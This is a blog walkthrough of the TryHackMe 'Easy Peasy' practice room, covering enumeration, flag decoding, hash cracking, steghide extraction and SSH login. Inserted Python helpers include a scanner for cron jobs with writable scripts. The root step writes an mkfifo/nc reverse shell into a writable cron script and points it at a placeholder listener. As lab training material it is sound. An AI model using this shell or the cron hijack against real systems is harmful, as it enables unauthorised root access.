
  • Easy Peasy TryHackMe walkthrough






    Easy Peasy


    Practice using tools such as Nmap and GoBuster to locate a hidden directory and get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cron job.


    [Task 1] Enumeration through Nmap


    Deploy the machine attached to this task and use nmap to enumerate it.




    #1 How many ports are open?
     

    nmap -A -Pn -T4 -p- 10.10.158.249 --script vuln






    Ans :-




    #2 What is the version of nginx?






    Ans :-







    #3 What is running on the highest port?


    Ans :-







    Notice we have 3 ports open:

    · 80: nginx 1.16.1

    · 6498: OpenSSH 7.6p1

    · 65524: Apache httpd 2.4.43




    [Task 2] Compromising the machine


    Now you've enumerated the machine, answer questions and compromise it!


    #1 Using GoBuster, find flag 1.


    Now, the fun part begins!

    The questions in this task require us to find hidden pages and files, so we start with a directory scan:



    gobuster dir -u http://TryHackMeIP/ -w /usr/share/dirb/wordlists/common.txt -x php,html,txt


    • dir : directory and file brute-force mode
    • -u  : the target URL
    • -w  : the wordlist path
    • -x  : extensions to append to every word (php, html, txt)

    Note that in gobuster the extensions flag is -x; -e is the "expanded" flag that only prints full URLs in the output, so passing the extension list to -e does not scan for those files.






    We see robots.txt and a directory named “hidden”. You can check them out, but both are dead ends on their own. For further enumeration, let’s brute-force inside the “hidden” directory too.



    gobuster dir -u http://10.10.158.249/hidden/ -w /usr/share/dirb/wordlists/common.txt -x php,html,txt







     Yeah, /whatever. Let us check what’s inside its source code, shall we?










     Nice! Our first flag, base64-encoded. Let’s decode it:









    Ans :- 





    #2 Further enumerate the machine, what is flag 2?


    Now we can move on to find our 2nd Flag. Let us run gobuster to find hidden directories again.

    gobuster dir -u http://10.10.137.230:65524/ -w /usr/share/wordlists/dirb/common.txt



    Let’s check “robots.txt”; there is a hash in it waiting to be cracked.
















    Its length says it is an MD5, but the usual local wordlist attack did not crack it. After searching around I found a site whose database had it:

    https://md5hashing.net/hash



    Select “Search by all hash types” and you have your 2nd flag.



    Ans :- flag{1m_s3c0nd_fl4g}






    #3 Locate flag 3.


    http://10.10.176.180:65524










    We may think this is the default page, but keep scrolling down and the 3rd flag is there in plain text, with no encoding at all.









    Ans :-




    #4 What is the hidden directory?


    We are not over with this page so let’s view-source:http://10.10.137.230:65524/







    Notice the hidden tag on line 194 of the source. It’s a bit tricky, because it is NOT base64 and the usual online base64 decoders won’t help. I tried the decoders on http://icyberchef.com/ and https://www.better-converter.com/Encoders-Decoders/Base62-Encode, and it turned out to be base62: decoding it gave the name of another hidden directory.









    Ans :- 






    #5 Using the file found in the hidden directory, find and crack a password hidden in the file.


    We may now enter the hidden directory on port 65524:






    We notice there is a hash and a picture waiting for us to investigate.

    First, let us crack the hash with https://md5hashing.net/hash again:
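    Both this hash and the one in robots.txt on port 65524 were cracked with an online lookup in this walkthrough. As an added example (not part of the original post), here is the local attempt to make first: narrow the algorithm by digest length, then run a wordlist through every hashlib algorithm of that length. The wordlist and digests below are constructed; an online lookup remains the fallback when the algorithm is one hashlib does not implement.

```python
import hashlib

# Added example (not from the walkthrough): identify a hash by its length and
# run a wordlist against every algorithm of that length, locally, before
# reaching for an online lookup.

# Constructed wordlist standing in for rockyou.txt or similar.
WORDLIST = ["password", "letmein", "password123", "admin", "flag{example}"]

# Digest length in hex characters -> hashlib algorithms producing it.
# Several algorithms share a length, so length only narrows the field.
BY_LENGTH = {
    32: ["md5"],
    40: ["sha1"],
    56: ["sha224"],
    64: ["sha256", "sha3_256", "blake2s"],
    96: ["sha384"],
    128: ["sha512", "sha3_512", "blake2b"],
}


def candidate_algorithms(hexdigest):
    """Algorithms whose hex digest has this length; [] for non-hex input or
    a length no algorithm here produces."""
    h = hexdigest.strip()
    if not h or any(c not in "0123456789abcdefABCDEF" for c in h):
        return []
    return list(BY_LENGTH.get(len(h), []))


def crack_hash(hexdigest, wordlist, algorithms=None):
    """Return (algorithm, plaintext) for the first wordlist entry that
    reproduces the digest, or None when nothing matches.

    None means: bigger list, mangling rules, or an algorithm hashlib lacks
    (GOST, NTLM variants, ...), which is when a lookup site helps."""
    target = hexdigest.strip().lower()
    algorithms = algorithms or candidate_algorithms(target)
    for word in wordlist:
        data = word.encode()
        for algo in algorithms:
            if hashlib.new(algo, data).hexdigest() == target:
                return algo, word
    return None


if __name__ == "__main__":
    demo = hashlib.md5(b"password123").hexdigest()   # constructed target
    print(candidate_algorithms(demo), crack_hash(demo, WORDLIST))
```

    Feed it the hash copied from robots.txt and a real wordlist (one entry per line) and it returns the algorithm together with the plaintext; a 32-character hex string that still fails here is either not in the list or not MD5 at all.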








    Ans :-



    #6 What is the password to login to the machine via SSH?



    That cracked hash is a password we will need in a moment.


    Remember the image on the hidden directory? Let’s download it on our desktop to reveal what’s inside…








    Use steghide to extract secrets out of this image and enter the password we just cracked.


    You can install it by:


    apt install steghide


    steghide extract -sf binarycodepixabay.jpg



    A text file is extracted. Inside it there is a username (boring) and a password for the SSH login, but the password is written in binary.








     I used this site to convert the binary to text:

    https://www.rapidtables.com/convert/number/binary-to-ascii.html







    Ans :- 




    #7 What is the user flag?


    Finally, it is time to ssh into this machine and check what’s going on:


    ssh -p 6498 boring@10.10.137.230


    P.S. Don’t forget the flag -p 6498, because this machine’s ssh port is not 22 but 6498!






    ls -la to see the user.txt waiting for us to be opened.

    cat user.txt


    The flag is rotated text (ROT13). I searched “rotated online decode” on Google and found this site to decode it:


    https://rot13.com/
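    The four encodings met in this room (base64 for flag 1, base62 for the hidden directory name, 8-bit binary for the SSH password, ROT13 for user.txt) can all be decoded offline instead of through the sites linked above. The following is an added example written for this walkthrough, not code from the original post. The base62 alphabet (0-9A-Za-z, CyberChef’s default) is an assumption, and the sample strings are constructed.

```python
import base64
import codecs
import string

# Added example (not from the walkthrough): the four encodings this room uses,
# decoded locally.

# Assumption: the 0-9A-Za-z alphabet (CyberChef's default). Other tools order
# the alphabet 0-9a-zA-Z; swap it in if the output looks wrong.
BASE62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase


def base64_decode(text: str) -> bytes:
    """Flag 1 was base64. validate=True rejects stray characters instead of
    silently skipping them; missing '=' padding is restored first."""
    cleaned = text.strip()
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True)


def base62_decode(text: str, alphabet: str = BASE62_ALPHABET) -> bytes:
    """The hidden directory name was base62: the string is one big integer
    in base 62, written out again as a big-endian byte string."""
    value = 0
    for ch in text.strip():
        if ch not in alphabet:
            raise ValueError(f"not a base62 digit: {ch!r}")
        value = value * 62 + alphabet.index(ch)
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


def base62_encode(data: bytes, alphabet: str = BASE62_ALPHABET) -> str:
    """Inverse of base62_decode; encode a known string to confirm the alphabet."""
    value = int.from_bytes(data, "big")
    if value == 0:
        return alphabet[0]
    digits = []
    while value:
        value, rem = divmod(value, 62)
        digits.append(alphabet[rem])
    return "".join(reversed(digits))


def binary_to_ascii(text: str) -> str:
    """The SSH password in the steghide output was 8-bit binary, with or
    without spaces between the bytes."""
    bits = "".join(text.split())
    if not bits or len(bits) % 8 or set(bits) - {"0", "1"}:
        raise ValueError("expected a whole number of 8-bit groups of 0/1")
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def rot13(text: str) -> str:
    """user.txt was ROT13: a Caesar shift by 13, which is its own inverse."""
    return codecs.decode(text, "rot_13")


def decode_candidates(text: str) -> dict:
    """Try every decoder and keep the ones that yield printable text. Handy
    when all you know is 'this looks encoded'."""
    results = {}
    for name, fn in (("base64", base64_decode), ("base62", base62_decode),
                     ("binary", binary_to_ascii), ("rot13", rot13)):
        try:
            out = fn(text)
        except (ValueError, UnicodeDecodeError):
            continue
        if isinstance(out, bytes):
            try:
                out = out.decode("ascii")
            except UnicodeDecodeError:
                continue
        if out and all(c.isprintable() for c in out):
            results[name] = out
    return results


if __name__ == "__main__":
    for sample in ("ZmxhZ3t0ZXN0fQ==", "synt{grfg}",          # constructed
                   "01100110 01101100 01100001 01100111"):
        print(sample, "->", decode_candidates(sample))
```

    Paste the string from the page source, the steghide output or user.txt into decode_candidates and read off which decoder produced something sensible; ROT13 always “succeeds” on letters, so treat its output as a candidate rather than an answer.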







    Ans :- 






    #8 What is the root flag?



    To solve the last question I needed root access. The room description gives the hint: “Then escalate your privileges through a vulnerable cronjob.” The vulnerable cron job runs a hidden .sh file in the /var/www directory, and that file was writable by our user, so whatever we put in it is executed the next time the job fires. I inserted the following reverse shell into the file:












    rm -f /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc <ip> <port> >/tmp/f

    Replace <ip> and <port> with the address and port of your own listener (the original line ran them together as nc <ip><port>, which nc rejects).
















    At the same time I started a netcat listener on that port to catch the shell, and after about a minute it connected. I used whoami to check that I really was root, and I was. root.txt was also a hidden file, so I used ls -la to list the hidden files and finally cat to read it.
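    The check behind this privilege escalation, as an added example that is not part of the original walkthrough: parse a system crontab, pull out the files each job references, and report the ones a low-privileged user could write. The crontab text, the script names and the temp directory are constructed for the demo; on a target you would feed it /etc/crontab and the files under /etc/cron.d together with your own uid and group ids.

```python
import os
import re
import stat
import tempfile

# Added example (not from the walkthrough): find cron jobs whose script a
# low-privileged user can edit. A job run by root from a writable file lets
# whoever can write that file run code as root on the next tick.

# System crontab line: minute hour day month weekday user command
JOB_RE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+|@\w+)\s+(\S+)\s+(.+)$")
# Absolute paths inside the command (the script itself and anything passed to it).
PATH_RE = re.compile(r"(?<![\w.])(/[\w./-]+)")


def parse_system_crontab(text):
    """Return (schedule, user, command) for each job in /etc/crontab or a
    /etc/cron.d file (the formats that carry a user field)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split()[0]:      # SHELL=..., PATH=..., MAILTO=...
            continue
        m = JOB_RE.match(line)
        if m:
            jobs.append((m.group(1), m.group(2), m.group(3)))
    return jobs


def writable_by(path, uid, gids):
    """Can a user with this uid/gids modify the file? Decided from the mode
    bits and ownership rather than os.access, so the answer does not depend
    on whoever happens to run this script."""
    st = os.stat(path)
    if st.st_mode & stat.S_IWOTH:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return st.st_uid == uid and bool(st.st_mode & stat.S_IWUSR)


def find_writable_cron_jobs(text, uid, gids):
    """(user, command, path) for every existing file a job references that
    the given user could write."""
    findings = []
    for _schedule, user, command in parse_system_crontab(text):
        for path in PATH_RE.findall(command):
            if os.path.isfile(path) and writable_by(path, uid, gids):
                findings.append((user, command, path))
    return findings


def build_demo():
    """Constructed fixture: two scripts in a temp dir, one world-writable,
    both referenced from root jobs. Returns (crontab_text, tmpdir)."""
    tmp = tempfile.mkdtemp(prefix="cron_demo_")
    loose = os.path.join(tmp, ".hidden_job.sh")   # hypothetical name
    tight = os.path.join(tmp, "backup.sh")        # hypothetical name
    for p in (loose, tight):
        with open(p, "w") as fh:
            fh.write("#!/bin/bash\necho tick\n")
    os.chmod(loose, 0o777)   # the mistake the room is built around
    os.chmod(tight, 0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "PATH=/usr/bin:/bin\n"
        "# m h dom mon dow user command\n"
        f"* * * * * root {loose}\n"
        f"0 3 * * * root /bin/bash {tight}\n"
    )
    return crontab, tmp


if __name__ == "__main__":
    crontab, _ = build_demo()
    # uid=-1 and no groups: "a user who owns nothing", so only o+w counts.
    for user, command, path in find_writable_cron_jobs(crontab, uid=-1, gids=set()):
        print(f"{user} runs {command!r}; {path} is writable by us")
```

    On the box, run it with uid=os.getuid() and gids=set(os.getgroups()) against the real crontab files; the job that shows up is the one to drop the reverse shell into. Per-user crontabs (crontab -l) have no user column and are not covered here.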



    This CTF was pretty fun to do and also pretty hard. I want to thank Kral4 again for this beautiful CTF and make sure to try it out. Thank you for reading.









    Ans :-








    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


  • 2 comments:

    1. Such a very useful article. Very interesting to read this article. I would like to thank you for the efforts you had made for writing this awesome article. Learn best Ethical Hacking Course in Bangalore

    2. I really enjoy simply reading all of your weblogs. Simply wanted to inform you that you have people like me who appreciate your work. Definitely a great post. Hats off to you! The information that you have provided is very helpful. Learn best Ethical Hacking Training in Bangalore


    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.